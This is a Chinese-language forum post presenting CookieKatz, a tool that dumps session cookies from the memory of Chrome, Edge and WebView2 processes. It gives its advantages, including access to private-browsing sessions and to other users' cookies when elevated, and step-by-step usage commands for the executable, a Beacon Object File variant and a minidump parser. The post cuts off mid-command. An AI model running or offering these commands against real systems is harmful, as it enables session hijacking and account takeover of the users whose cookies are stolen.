|
工具介绍 CookieKatz 是一个允许直接从进程内存转储 Chrome、Edge 或 Msedgewebview2 的 cookie 的项目,最新版本现在支持最新的 Chrome 和 Edge。基于 Chromium 的浏览器在启动时会从磁盘上的 cookie 数据库加载所有 cookie。
此版本支持Chrome版本125.0.6422.142和Edge版本125.0.2535.79
[color=rgba(0, 0, 0, 0.9)]这种方法的好处是: 支持从 Chrome 的 Incogntio 和 Edge 的 In-Private 进程中转储 cookie运行提升权限时访问其他用户浏览器的 cookie从 webview 进程转储 cookies无需接触磁盘上的数据库文件无需 DPAPI 密钥即可解密 Cookie从小型转储文件离线解析 cookie
[color=rgba(0, 0, 0, 0.9)]不利的一面是,即使查找内存中正确偏移量的方法目前是稳定的并且可以在多个不同版本上运行,但它在未来的某个时候肯定会出现故障。不支持 32 位浏览器安装,也不支持 32 位版本的 CookieKatz。
[color=rgba(0, 0, 0, 0.9)]该解决方案由三个项目组成:CookieKatz(PE 可执行文件)、CookieKatz-BOF(Beacon 对象文件版本)和CookieKatzMinidump(小型转储解析器)。 [color=rgba(0, 0, 0, 0.9)] 工具使用 注意!当选择使用 PID 作为目标时,请分别使用命令 /list 或 cookie-katz-find 来选择正确的子进程!
CookieKatzExamples:.\CookieKatz.exe By default targets first available Chrome process.\CookieKatz.exe /edge Targets first available Edge process.\CookieKatz.exe /pid:<pid> Attempts to target given pid, expecting it to be Chrome.\CookieKatz.exe /webview /pid:<pid> Targets the given msedgewebview2 process.\CookieKatz.exe /list /webview Lists available webview processes
Flags: /edge Target current user Edge process /webview Target current user Msedgewebview2 process /pid Attempt to dump given pid, for example, someone else's if running elevated /list List targettable processes, use with /edge or /webview to target other browsers /help This what you just did! -h works as well
CookieKatz-BOFbeacon> help cookie-katzDump cookies from Chrome or EdgeUse: cookie-katz [chrome|edge|webview] [pid]
beacon> help cookie-katz-findFind processes for Cookie-KatzUse: cookie-katz-find [chrome|edge|webview]
CookieKatzMinidump[color=rgba(0, 0, 0, 0.9)] Usage: CookieKatzMinidump.exe <Path_to_minidump_file>
Example: .\CookieKatzMinidump.exe .\msedge.DMP
To target correct process for creating the minidump, you can use the following PowerShell command: Get-WmiObject Win32_Process | where {$_.CommandLine -match 'network.mojom.N
| 
发表于 2024-6-22 15:14:57